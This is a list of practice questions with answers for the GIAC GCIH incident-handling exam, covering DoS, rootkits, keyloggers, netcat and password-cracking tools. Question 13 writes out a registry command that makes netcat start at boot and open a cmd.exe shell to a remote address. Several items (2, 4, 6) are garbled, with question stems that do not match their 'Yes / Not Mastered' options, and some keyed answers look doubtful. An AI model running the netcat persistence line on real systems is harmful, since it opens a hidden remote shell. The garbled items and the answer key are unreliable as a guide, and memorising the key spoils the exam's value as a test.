GIAC GCIH Free Practice Questions

NEW QUESTION 1
Which of the following is used by attackers to obtain an authenticated connection on a network?

• A. Denial-of-Service (DoS) attack
• B. Replay attack
• C. Man-in-the-middle attack
• D. Back door

Answer: B

NEW QUESTION 2
Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.

• A. Yes
• B. Not Mastered

Answer: A

NEW QUESTION 3
Brutus is a password cracking tool that can be used to crack the following authentications:
l HTTP (Basic Authentication)
l HTTP (HTML Form/CGI)
l POP3 (Post Office Protocol v3)
l FTP (File Transfer Protocol)
l SMB (Server Message Block)
l Telnet
Which of the following attacks can be performed by Brutus for password cracking?
Each correct answer represents a complete solution. Choose all that apply.

• A. Hybrid attack
• B. Replay attack
• C. Dictionary attack
• D. Brute force attack
• E. Man-in-the-middle attack

Answer: ACD

NEW QUESTION 4
Choose the items from the given list that are required to be in the response kit of an Incident Handler.

• A. Yes
• B. Not Mastered

Answer: A

NEW QUESTION 5
Which of the following languages are vulnerable to a buffer overflow attack?
Each correct answer represents a complete solution. Choose all that apply.

• A. Java
• B. C++
• C. C
• D. Action script

Answer: BC

NEW QUESTION 6
Rick works as a Professional Ethical Hacker for Exambible Inc. The company has opened a new branch that uses Windows-based computers. Rick has been assigned a project to check the network security of the new branch office. He wants to ensure that the company is free from remote hacking attacks.
Choose the appropriate steps that Rick should perform to accomplish the task.

• A. Yes
• B. Not Mastered

Answer: A

NEW QUESTION 7
Which of the following are used to identify who is responsible for responding to an incident?

• A. Disaster management policies
• B. Incident response manuals
• C. Disaster management manuals
• D. Incident response policies

Answer: D

NEW QUESTION 8
Which of the following rootkits adds additional code or replaces portions of an operating system, including both the kernel and associated device drivers?

• A. Hypervisor rootkit
• B. Boot loader rootkit
• C. Kernel level rootkit
• D. Library rootkit

Answer: C

NEW QUESTION 9
Your network is being flooded by ICMP packets. When you trace them down they come from multiple different IP addresses. What kind of attack is this?

• A. Syn flood
• B. Ping storm
• C. Smurf attack
• D. DDOS

Answer: D

NEW QUESTION 10
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

• A. Kernel keylogger
• B. Software keylogger
• C. Hardware keylogger
• D. OS keylogger

Answer: C

NEW QUESTION 11
Which of the following is a version of netcat with integrated transport encryption capabilities?

• A. Encat
• B. Nikto
• C. Socat
• D. Cryptcat

Answer: D

NEW QUESTION 12
A user is sending a large number of protocol packets to a network in order to saturate its resources and to disrupt connections to prevent communications between services. Which type of attack is this?

• A. Vulnerability attack
• B. Impersonation attack
• C. Social Engineering attack
• D. Denial-of-Service attack

Answer: D

NEW QUESTION 13
You run the following command on the remote Windows server 2003 computer:
c:reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v nc /t REG_SZ /d
"c:windowsnc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

• A. You want to perform banner grabbing.
• B. You want to set the Netcat to execute command any time.
• C. You want to put Netcat in the stealth mode.
• D. You want to add the Netcat command to the Windows registry.

Answer: BCD

NEW QUESTION 14
You are the Administrator for a corporate network. You are concerned about denial of service attacks.
Which of the following would be the most help against Denial of Service (DOS) attacks?

• A. Packet filtering firewall
• B. Network surveys.
• C. Honey pot
• D. Stateful Packet Inspection (SPI) firewall

Answer: D

NEW QUESTION 15
Your company has been hired to provide consultancy, development, and integration services for a company named Brainbridge International. You have prepared a case study to plan the upgrade for the company. Based on the case study, which of the following steps will you suggest for configuring WebStore1?
Each correct answer represents a part of the solution. Choose two.

• A. Customize IIS 6.0 to display a legal warning page on the generation of the 404.2 and 404.3 errors.
• B. Move the WebStore1 server to the internal network.
• C. Configure IIS 6.0 on WebStore1 to scan the URL for known buffer overflow attacks.
• D. Move the computer account of WebStore1 to the Remote organizational unit (OU).

Answer: AC

NEW QUESTION 16
Adam works as a Security Analyst for Umbrella Inc. Company has a Windows-based network. All computers run on Windows XP. Manager of the Sales department complains Adam about the unusual behavior of his computer. He told Adam that some pornographic contents are suddenly appeared on his computer overnight. Adam suspects that some malicious software or Trojans have been installed on the computer. He runs some diagnostics programs and Port scanners and found that the Port 12345, 12346, and 20034 are open. Adam also noticed some tampering with the Windows registry, which causes one application to run every time when Windows start.
Which of the following is the most likely reason behind this issue?

• A. Cheops-ng is installed on the computer.
• B. Elsave is installed on the computer.
• C. NetBus is installed on the computer.
• D. NetStumbler is installed on the computer.

Answer: C

NEW QUESTION 17
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access.
How was security compromised and how did the firewall respond?

• A. The attack was social engineering and the firewall did not detect it.
• B. Security was not compromised as the webpage was hosted internally.
• C. The attack was Cross Site Scripting and the firewall blocked it.
• D. Security was compromised as keylogger is invisible for firewall.

Answer: A

NEW QUESTION 18
Which of the following is the method of hiding data within another media type such as graphic or document?

• A. Spoofing
• B. Steganography
• C. Packet sniffing
• D. Cryptanalysis

Answer: B

NEW QUESTION 19
Which of the following statements about Denial-of-Service (DoS) attack are true?
Each correct answer represents a complete solution. Choose three.

• A. It disrupts services to a specific computer.
• B. It changes the configuration of the TCP/IP protocol.
• C. It saturates network resources.
• D. It disrupts connections between two computers, preventing communications between services.

Answer: ACD

NEW QUESTION 20
Which of the following types of attacks slows down or stops a server by overloading it with requests?

• A. DoS attack
• B. Impersonation attack
• C. Network attack
• D. Vulnerability attack

Answer: A

NEW QUESTION 21
......